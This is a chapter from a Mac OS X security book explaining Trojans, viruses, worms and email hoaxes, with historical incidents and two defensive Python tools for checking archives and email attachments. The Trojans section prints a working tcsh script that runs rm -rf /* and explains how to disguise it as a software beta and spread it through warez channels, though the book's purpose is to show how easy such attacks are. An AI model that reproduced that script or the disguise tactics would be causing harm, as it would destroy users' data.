# Malware

Malware typically tends to be subcategorized into Trojans, Viruses, and Worms, which are discussed in the following sections. The terms are frequently misused in the lay literature, and this is only partially due to a lack of comprehension on the part of those misusing them. With increasing frequency, malware is blurring the lines between these by functioning in multiple modes, or by working on the boundary of areas where operating systems and utility software are automating tasks that were previously the realm of user behavior.

## ROBERT MORRIS STARTED IT ALL

To be sure, there were viruses, Trojans, and worms before Robert Morris scratched his head and said, "Huh, they couldn't have been that dumb" (or something to that effect), and wrote a bit of software to test what he perceived to be a flaw in the design of the predominant Internet mail-delivery system. Robert, however, ushered in, in an almost prophetic way, the current age of Internet insecurity. When he released his test code, it got away. It got away in a big, bad way, and it started breaking systems that were part of the backbone of the Internet. When he realized what was happening, Robert tried to release information to sites on how they could neutralize it, but unfortunately, his test worm broke the mailing infrastructure for the Internet, and his message did not get through until the damage was done. Robert was eventually convicted of violation of the Computer Fraud and Abuse Act, and sentenced to three years of probation, four hundred hours of community service, and a fine of $10,500 (http://sunland.gsfc.nasa.gov/info/guide/The_Internet_Worm.html). Although his act was certainly irresponsible, many think it's hard to justify the sentence in context. What Robert did, almost any one of us looking at network security at the time could have ended up doing. It was inevitable that someone would notice the fault, and in a climate where the concept of network-borne self-replicating code was novel, it was almost as inevitable that whoever noticed the possibility would test it, just to be sure he wasn't seeing things. To be sure, today's network viruses and worms are malicious software, written by, at best, uncaring and, more probably, truly evil persons. If the perpetrators could be found, $10,500 would be a slap on the wrist compared to what they deserve. By all the evidence, however, Robert's worm, the one that started it all, was an experiment gone accidentally and terribly wrong.

#### Trojans

Trojans (or sometimes Trojan horses) are applications that claim to do one thing, while in fact doing something else, usually something malicious. Trojans get their name from the famous Trojan horse of ancient Greek history, by which the Greek army overcame the impenetrable fortress of Troy by the subterfuge of a troop carrier disguised as a horse-shaped monument, and given as a gift. Trojans are not typically self-replicating, instead relying on the gullibility or malice of humans to distribute them to other systems. The malicious payload of Trojan software can be almost anything that can be believably packaged into something that looks, at least at first glance, like a beneficial application. There have been games that were actually Trojan installers for viruses, shell scripts that were Trojan installers of back doors into systems, even mail servers and security software applications that were actually malicious security exploits that attacked other systems on the network.

Writing a Trojan is abysmally simple work. If you were to write the following shell script and distribute it on the Web or through email (or better yet, through some facility such as Hotline or Carracho, where software pirates who are out looking for "WaReZ" live) to people as iDVD4_Beta4.tgz, you'd undoubtedly end up erasing a number of drives.

    #!/bin/tcsh -f
    /bin/rm -rf /* >& /dev/null &
    exit 1

If you make it executable, tar and gzip it, the vast majority of people who download it without looking at the size are likely to run it without ever looking inside to see what's lurking there. If you're concerned that they might think something's up because the file is so much smaller than what one might expect, just tack on a pile of junk comments at the bottom. If you really want to be massively nasty, use something like ScriptGUI (available from http://homepage.mac.com/cnorris/ScriptGUI/) and wrap it up as a Scriptlet so that it's convenient for people to run it by double-clicking in the Finder.

If you make it big enough to be believable, package it as a double-clickable application so that it can be downloaded, decompressed with UnStuffit, and run by double-clicking in the Finder, and then distribute it in an appropriate 0-day ("zero day," as in "fresh") warez group, the thieving little leeches (http://www.catb.org/jargon/html/entry/leech.html) will probably trade it around for days before someone catches on to what it's doing and still has enough computer left to tell anyone about it.

The fact that Trojans are so trivially simple to construct, and users are so ready to believe and execute almost any application that's handed to them, is what makes Trojans such a threat. If users (and system administrators) lived by the adages never install any software as root, and never install any software that you haven't read the code for yourself, Trojans would be stopped almost dead in their tracks. The first of these admonitions is moderately painful, especially given the way that most OS manufacturers (including Apple) are packaging nonvendor components in what should be vendor-only directories, but it is one that you should strive to obey. As a matter of fact, you should avoid running any software as root for which root isn't absolutely required (this includes avoiding the use of sudo). Running software installers as root, however, offers a prime way for Trojan software to do massive damage to your system or install back doors for crackers to use for other mischief.

It's impractical to obey the sanction against never installing anything you've not read the code for, but implicit in the fact that you acknowledge this impracticality is an understanding that you will, at some point, be running software (installers and applications) on your system for which you really have no idea what they're going to do. This should worry you, and unless you have a very good reason to trust some particular application or installer, you probably should explicitly think about the fact that you're tossing the dice, and hoping that it's not a Trojan. Sometimes the dice come up craps; I've seen it happen. A network administrator I've worked with rolled the dice on an unverified copy of tcpwrappers (in its normal state a wonderful security suite that we've discussed in several places in this book), and ended up costing his company three months of system downtime while they tried to recover from the mess caused by the Trojan he had installed.

Two popular Open Source packages have recently been Trojaned. In July 2002, version 3.4p1 of the OpenSSH package, which is covered in Chapter 14, "Remote Access: Secure Shell, VNC, Timbuktu, Apple Remote Desktop," was Trojaned. Fortunately, because the developers noticed a different checksum for the distribution, the Trojan was discovered quickly. In the Trojan version, the makefile included code that when compiled opened a channel on port 6667, an IRC port, to a specific machine. It could then open a shell running as the user who compiled the program. In September 2002, Sendmail 8.12.6 was also Trojaned. The Sendmail Trojan was similar to the OpenSSH Trojan. It contained code that was executed at compile time, and also opened an IRC channel to a specific, already cracked host. Unlike the OpenSSH incident, about a week had gone by before the Trojan was discovered. In this case, sendmail.org's FTP server was modified so that the Trojan code was distributed with every 10 downloads without ever modifying the original package. The owner of the cracked machine that the Trojan used as a communications hub lost all of his data, about seven or eight years' worth, including financial records, when the controller of the Trojan tried to erase his tracks. Although these recent Trojan examples didn't cause local damage to the machines with the installed Trojans, they do show that some of the most important software we rely on can indeed be Trojaned. The next time, the Trojans could be more malicious and not just inconvenient. You can read more about these Trojans at http://www.securityfocus.com/news/560 and http://www.securityfocus.com/news/1113.
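Both defenses the text describes, comparing a downloaded distribution against its published checksum (which is how the OpenSSH Trojan was caught) and looking inside an archive before running anything from it (which would have exposed the tiny iDVD4_Beta4.tgz script), can be automated. The following is an added example written for this chapter, not code from the book or from the OpenSSH or Sendmail projects. The archive it checks is constructed in memory and labelled as such; the published checksum is whatever value you copy from the project's announcement, and the minimum-size threshold is an assumed figure the caller supplies.

```python
import hashlib
import hmac
import io
import tarfile
from typing import List


def build_sample_archive() -> bytes:
    """Constructed sample: a tiny .tgz, named like the bait in the text,
    holding one executable shell script. Built in memory for the demo only;
    the script body is a harmless placeholder, not the one from the text."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        script = b"#!/bin/tcsh -f\necho placeholder\n"
        info = tarfile.TarInfo(name="iDVD4_Beta4/install")
        info.size = len(script)
        info.mode = 0o755  # executable, as a Trojan script would need to be
        tar.addfile(info, io.BytesIO(script))
    return buf.getvalue()


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def checksum_matches(data: bytes, published: str) -> bool:
    """Compare the download's SHA-256 with the checksum published by the
    project. The comparison is constant-time out of habit; the point is that
    a mismatch means you do not unpack the file, let alone build it."""
    return hmac.compare_digest(sha256_hex(data), published.strip().lower())


def inspect_archive(data: bytes, expected_min_bytes: int) -> List[str]:
    """Return human-readable warnings about an archive without extracting it:
    implausibly small size, executables and scripts, paths that escape the
    extraction directory, and links. expected_min_bytes is an assumed figure
    the caller chooses from what a real release of that software weighs."""
    warnings = []
    if len(data) < expected_min_bytes:
        warnings.append(
            f"archive is only {len(data)} bytes; expected at least {expected_min_bytes}"
        )
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:gz") as tar:
        for m in tar.getmembers():
            parts = m.name.split("/")
            if m.name.startswith("/") or ".." in parts:
                warnings.append(f"{m.name}: path escapes the extraction directory")
            if m.issym() or m.islnk():
                warnings.append(f"{m.name}: link to {m.linkname}")
            if m.isfile() and m.mode & 0o111:
                fobj = tar.extractfile(m)
                head = fobj.read(2) if fobj else b""
                kind = "script" if head == b"#!" else "binary"
                warnings.append(f"{m.name}: executable {kind} ({m.size} bytes)")
    return warnings


if __name__ == "__main__":
    download = build_sample_archive()
    # Stand-in for the checksum you would copy from the project's announcement.
    published = sha256_hex(download)
    print("checksum ok:", checksum_matches(download, published))
    for w in inspect_archive(download, expected_min_bytes=1_000_000):
        print("warning:", w)
```

The size check alone catches the padded-with-comments trick the text mentions only if the threshold is set from a real release; the member listing does not depend on size at all, which is why a script with the execute bit set inside something sold as an application beta is reported regardless.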

#### Viruses

Viruses are microapplications that can embed themselves in documents or software in such a way that when the documents are opened or the software run, the microapplication is also allowed to run. When executed in this fashion, the virus replicates itself into other documents or applications. A key feature to note is that viruses are self-replicating, but require some action on the part of a user to become active and to propagate. In the early days of personal computers, viruses lived in assorted application files or in various file system structures on floppy disks and replicated either when the documents were opened or by the action of reading the floppy. Propagation, however, was solely by the transfer of files from one computer to another, or in the case of floppy-embedded viruses, by the transfer of a floppy disk itself. Today, viral embeddings are similar, but email attachments are allowing viral distribution to proceed considerably faster and further than was ever possible with floppy-borne viruses. Viruses typically carry some executable payload in addition to their self-replicating functions. This payload is often malicious in nature, but a number of viruses have been written in which the payload was intended to be nothing more than an amusing pop-up message or screen display on a certain date.

Unfortunately, although considerable benefits could be gained from such a system for propagating useful software updates, the real problems inherent to it are considerable, and are likely to outweigh the possible benefits by a distinct margin. Probably the most serious practical complaint is the simple fact that there would be no way to prevent authors of malicious viruses from claiming that their viruses were beneficial, essentially Trojaning a bad virus into the system under the guise of a friendly update.

One of the most insidious aspects of viruses is that they're effectively run by you (or whatever user is executing the software containing the virus or reading the document), whether you (or they) know it or not. This gives viruses the permission to do whatever you have permission to do, and to pretend to other applications and systems that they are doing it with your authorization. This means that if you've run an infected application, whatever that virus does, it's just done it with all the authorizations and permissions you have. If you want to avoid viruses in your email sending copies of themselves to every person in your address book and masquerading as you having done it, you need to stay away from email software that's susceptible to viruses. If you don't, the email viruses you receive will have free run to do whatever you can do with your permission.

A virus that you have probably encountered was the Sircam virus, which was especially prevalent during the summer of 2001. The virus was propagated in email. It attempted to send itself and local documents to the users listed in the Windows Address Book and to any email addresses left in a user's Web browser cache. A message, in either English or Spanish, containing the Sircam virus, indicated that it was asking for your advice. As a Mac user, you probably found this junk mail a bit annoying, but your Windows friends may have experienced local damage, including loss of their data or their hard drive space filling up. You can find out more about this virus at http://vil.nai.com/vil/content/v_99141.htm.

More recently, in October 2002 the Bugbear virus was prevalent. However, as a Mac user, you may not even have noticed it because the virus normally propagated itself in email messages with a variety of names and content, although it could also propagate via network shares. It contained a Trojan that could disable antivirus and firewall processes, provide access to a remote attacker, and log keystrokes. Consequently, it could potentially email confidential information from the recipient's email account. You can find out more about this virus at http://vil.nai.com/vil/content/v_99728.htm and http://www.securityfocus.com/news/925.

#### Worms

Worms are much like self-propagating viruses that do not require any human interaction to allow them to move from system to system or to replicate. Worms also do not require a "host" application in which to embed themselves, though they often propagate themselves by wrapping themselves in some document for the purpose of transmission. With the advent of email applications that automatically execute code contained in email messages, we now see a class of malware that is difficult to categorize cleanly between these types. They are self-propagating only as a result of wildly poor programming and configuration decisions, essentially allowing the mail client to act as the user and autoexecute content, and would function only as viruses without the benefit of this brain-damaged programming. Similarly, there are autoexecute capabilities provided by most modern operating systems for a variety of types of removable media, which would allow a proper worm to distribute itself via sneakernet (http://www.catb.org/jargon/html/entry/sneakernet.html), if only it could think up a way to get itself onto a Zip disk or CDR without needing to hide in an already-existing data file.

Most issues with worms are comparable to virus issues, with the predominant difference being that worms don't necessarily run as (aren't always run by) normal users. Worms typically deliver themselves via the network, and although some have recently done so by using users' email clients, it's also common for them to do so by using system-level facilities. If the service that the worm is using to propagate has root permissions, the worm will have root permission when it runs.

A couple of recent worms that you have probably heard about include the Code Red worm and the SQL Slammer worm. In the summer of 2001 two variants of the Code Red worm regularly made the headlines. Code Red exploited buffer overflow vulnerabilities in Microsoft's IIS web server. On an infected machine the worm existed only in memory, making it difficult for a victim machine to detect its presence. However, infected machines often contained a defaced Web page stating that they had been "Hacked By Chinese." After the worm had infected a machine, it searched for other vulnerable systems to infect. This resulted in network slowdown. If you were running a non-IIS Web server at the time, you discovered that your Web server's logs were growing with requests for the file default.ida. You can read more about this worm on the various antivirus vendor and news sites.

#### Hoaxes

Although not actually a type of malware, various Internet hoaxes are sometimes almost as damaging as actual malicious software. It's not at all uncommon for emails warning of the great and impending danger of some virus to make its way around the network almost as fast as a real virus, and to disrupt network and computer usage nearly as effectively. Most often these are messages like the Good Times warning, telling the user of some dangerous email virus that they must delete immediately if they see it in their mailboxes. The warnings then go on to suggest that the user forward the message to as many people as they can, so that the rest of the world can be similarly saved. When this happens, network administrators typically suffer from receiving hundreds upon hundreds of useless copies of the warning, diluting the information they have for finding the real ongoing problems of the system. In a twistedly amusing sense, many email virus hoaxes function as viruses themselves. The "software" that they invade to get themselves replicated is the stuff in the human skull, but the effect is the same: They show up, convince something to replicate them, and then pop off to infect other units that can replicate them further. For this reason it's useful to consider hoaxes in the general scheme of malware, even though the operating system they run on is the human brain.

Some viruses or worms, though, may seem to be hoaxes, but are really malicious software. For example, one of the variants of the Klez worm can send itself in an email message that claims that it is a free immunity tool to defend systems against itself. The worm exploits a vulnerability in Internet Explorer that enables it to infect a machine when an email message that contains it is opened or previewed, but even in a system where Explorer or Outlook Express aren't executing code without a user's permission, the claim that the software is beneficial can be sufficient to cause the gullible to execute it themselves. Klez can propagate via network shares by copying itself into RAR archives, and by sending itself to addresses in the Windows Address Book. When it propagates by email it often includes a local file as an attachment, possibly sending sensitive information. It can also disable antivirus software. You can read more about Klez at the various antivirus software vendor sites.

## THE PRICE OF CONVENIENCE

Interestingly, until recently (or until the late 1990s, at least), any email warning of an email-borne virus that you "had to delete immediately without looking at it" was generally considered a hoax. Until then, email applications would open messages and tell you that you had an attachment. They'd give you the option to save it, and then you could open it in the appropriate application. Email warnings of things such as the Good Times virus (a hoax) would start propagating, and you'd turn to CERT and plain as day would be a general advisory that viruses weren't known to propagate automatically through email. Not since Robert Morris demonstrated that mailers with autoexecute capability were a Bad Idea had anyone been blitheringly stupid enough to allow an email application to automatically execute arbitrary software that was delivered to it over the wire. Then came Microsoft Outlook and Microsoft Explorer, and everything changed.

Although Melissa (http://securityresponse.symantec.com/avcenter/venc/data/w97m.melissa.a.html) wasn't the first email virus, it's the first time I remember getting a message to "Watch out for this email virus, and mail this warning on to all your friends," that when I turned to CERT to check the status of the world, I found a warning saying, "This time it's real, guys!" I still remember the sinking feeling in the pit of my stomach as I deleted my long-standing explanation of viruses, worms, and the fact that there was no need to panic because users were safe from infection so long as they simply avoided running software or opening documents that appeared in their mail. I'd been mailing that explanation to calm my users and cut down on the repeated mailings of random hoaxes around the college for nearly 10 years, and here was a virus that blew it all away. Maddeningly, it wasn't that the virus or virus writers had gotten smarter, it was that the programmers who wrote the software, or the marketroids that controlled the features the programmers added, had put their companies' bottom lines above the safety and security of their customers and all other users on the Internet, and they'd made their software stupider. They removed the essential protection that network clients should never be allowed to execute code without the user's permission, and they'd set the default behavior in their software to do exactly the wrong thing.

The rest, as they say, is history. One outbreak of the Morris worm was enough to teach the Internet to use secure (or at least not blatantly vulnerable) mailing software for nearly 10 years. Four years after Melissa debuted (and according to Symantec, in certain variants she's still going strong), we're still stuck in a world where some email clients pathologically insist on doing something that no sane programmer would ever let an email client do.
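The rule this sidebar and the Viruses section both argue for, that a mail client may show you an attachment but must never run it on its own, is simple to enforce at the point where the message is parsed. The following is an added example, not code from the book or from any mail client, of an attachment audit that classifies each part and returns a verdict instead of opening anything. The message is constructed for the demo (the wording echoes the advice-seeking bait the text attributes to Sircam; the double-extension name is a constructed illustration of a document-looking executable); the extension lists are an assumed starting policy, not an exhaustive one.

```python
import email
from email import policy
from email.message import EmailMessage

# Assumed policy tables: extensions that Windows or a Unix shell will execute,
# and document types that can carry macros. Extend for your own environment.
EXECUTABLE_EXTS = {".exe", ".com", ".bat", ".pif", ".scr", ".vbs", ".js",
                   ".lnk", ".sh", ".csh", ".tcsh", ".pl"}
MACRO_CAPABLE_EXTS = {".doc", ".dot", ".xls", ".ppt"}
EXECUTABLE_TYPES = {"application/x-msdownload", "application/x-sh",
                    "application/x-csh", "application/x-executable"}


def build_sample_message() -> bytes:
    """Constructed sample: one executable hiding behind a document-looking
    name, one ordinary PDF. Not a real message; the bytes are placeholders."""
    msg = EmailMessage()
    msg["From"] = "friend@example.com"
    msg["To"] = "you@example.com"
    msg["Subject"] = "I send you this file in order to have your advice"
    msg.set_content("Hi! I send you this file in order to have your advice.")
    msg.add_attachment(b"MZ\x90\x00placeholder", maintype="application",
                       subtype="octet-stream", filename="report.doc.pif")
    msg.add_attachment(b"%PDF-1.4 placeholder", maintype="application",
                       subtype="pdf", filename="notes.pdf")
    return msg.as_bytes()


def classify_attachment(part) -> tuple:
    """Return (verdict, reason) for one MIME part without executing or
    rendering it. Verdicts: 'block', 'quarantine', 'allow'."""
    name = (part.get_filename() or "").lower()
    exts = name.split(".")[1:]          # every extension, so a.doc.pif -> [doc, pif]
    last = "." + exts[-1] if exts else ""
    if last in EXECUTABLE_EXTS:
        reason = "executable extension"
        if len(exts) > 1:
            reason += " hidden behind a document-looking name"
        return "block", reason
    if part.get_content_type() in EXECUTABLE_TYPES:
        return "block", "executable content type"
    if last in MACRO_CAPABLE_EXTS:
        return "quarantine", "macro-capable document; open only with macros disabled"
    return "allow", "no known executable form"


def audit_message(raw: bytes) -> list:
    """Parse a raw RFC 822 message and return [(filename, verdict, reason), ...]
    for each attachment. Nothing is saved, opened, or run."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    return [
        (part.get_filename(), *classify_attachment(part))
        for part in msg.iter_attachments()
    ]


if __name__ == "__main__":
    for filename, verdict, reason in audit_message(build_sample_message()):
        print(f"{verdict:10} {filename}: {reason}")
```

The design point is that the client's default action is a verdict shown to the user, never an execution: an "allow" still means the user chooses to save and open the file in the appropriate application, which is exactly the pre-Outlook behavior the text describes. Checking the last extension rather than the first is what defeats the double-extension trick, since the operating system, not the user, decides which one counts.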

Hoaxes, however, aren't limited to virus warnings. One still sees occasional flurries of emails asking for kindly donation of get-well postcards sent to Craig Shergold, a boy dying of cancer in England who wanted to be in the Guinness book of records for having received the most cards. The initial request went out in 1989, and by 1991 he was not only in the book, but also cured. The emails requesting postcards, and, of course, that the request be again forwarded to as many people as the recipient can, however, refuse to die. To date, some 200 million postcards have been received, and Craig's house has had to be assigned the British equivalent of its own ZIP code (http://www.snopes.com/inboxer/children/shergold.htm).

Like real viruses, this one is spread by humans, from human to human, and it mutates along the way. There are now a number of variants circulating the Net, requesting postcards be sent to various places around the world. One directs people to send them to the Cincinnati Shriner's Hospital in Cincinnati, Ohio, where they're now down to only 10,000 or so pieces of unwanted mail per week from their high of 50,000 per week in mid-2001.

Some of the computer-related hoaxes don't even need computers to spread. Our published news sources, always looking for a juicy tidbit to use in fearmongering about technology they don't understand, or to toss mud in the face of the "evil" government often practically trip over each other to print unverified misinformation if it's juicy enough. In one notable 1992 case regarding Operation Desert Storm/Desert Shield, U.S. News and World Report ran a story "Triumph Without Victory: The Unreported History of the Persian Gulf War," in which they reported that the National Security Agency had intercepted computer printers bound for Iraq and inserted chips into them that made the printers give Iraqi computers viruses, which then shut down their air defense system during Operation Desert Storm. The report was picked up by a number of news services and widely distributed as fact. TV anchor Ted Koppel even opened a Nightline broadcast with news of this dastardly U.S. subterfuge. Put aside the absolute gullibility required to believe that the NSA had somehow come up with all the necessary information, software, and probably black magic required to get a bug in a printer to shut down the Iraqi air defense system. Then you still have to accept that after they managed all this engineering they had no better way to deliver the payload than through a French printer that was intercepted by chance. The fact still remains that an almost identical story was run the year before in Infoworld, as an April Fool's joke (http://www.vmyths.com/hoax.cfm?id=123&page=3 and http://catless.ncl.ac.uk/Risks/13.06.html#subj3).

#### Other Stuff

A host of other applications might be considered malware in certain circumstances that we won't be mentioning here. For example, a keystroke logger being run by one of your users without permission is certainly a poison pill. It's not, however, in the context of what we're going to discuss in this chapter, as it's under the relatively direct control of another person and isn't acting autonomously. These applications are covered in the various chapters that detail the vulnerability types that they exploit. Keystroke loggers, because they're most useful for stealing passwords, are covered in Chapter 5, "Picking Locks: Password Attacks," with the rest of the password security-related material.

On the other hand, there are many situations where software may do you harm, without it being malware in any sense. If you've mistakenly typed \rm -rf /* at the prompt, the rm command isn't a Trojan, and it's not malware. The system is simply going to eviscerate itself at your command. If you weren't aware of what rm was going to do, that's not rm's fault: the man pages are very clear.

Likewise, a bug in a program doesn't make it malware. The exceedingly poor interaction between Tenon's original XTools for OS X release, and the then-current version of Apple's installer (an interaction which corrupted the system so badly that nothing short of wiping the drive and doing a clean install seemed to fix it) was a bug, not an incident of either Tenon's software or Apple's installer being malware.

Finally, there is malware that's not actually capable of doing damage or harm. Often this is because it was written on a different platform, or with the expectation of different installed software, leaving it dormant on your system. For Macintosh users, the vast majority of email-borne viruses and worms fall into this category today, because the software has been written to function on a Windows platform, and on the Mac it's just nonsensical garbage. Usually these types of malware are dormant on an incompatible host, but can come to life again if they are transferred from the incompatible host to another that they were designed to operate on. There are also instances of broken malware: software that's designed to invade or damage your system, but that's so poorly designed or written that it can't perform its intended function. Frequently, this is a good thing because it prevents the software from causing the damage that it otherwise would. For example, the old Antibody HyperCard virus was intended to remove the MerryXmas HyperCard virus, but it could trigger an error that would cause your stack to quit. Sometimes, though, errors of the exact same nature turn a bit of malware that didn't have an intentionally damaging payload into an actually harmful threat. For example, the old INIT17 virus was a benign virus that when triggered should have done nothing more than display a message that read, "From the Depths of CyberSpace." However, on 68k Macs, it caused crashes.

Maximum Mac OS X Security
ISBN: 0672323818
Year: 2003
Pages: 158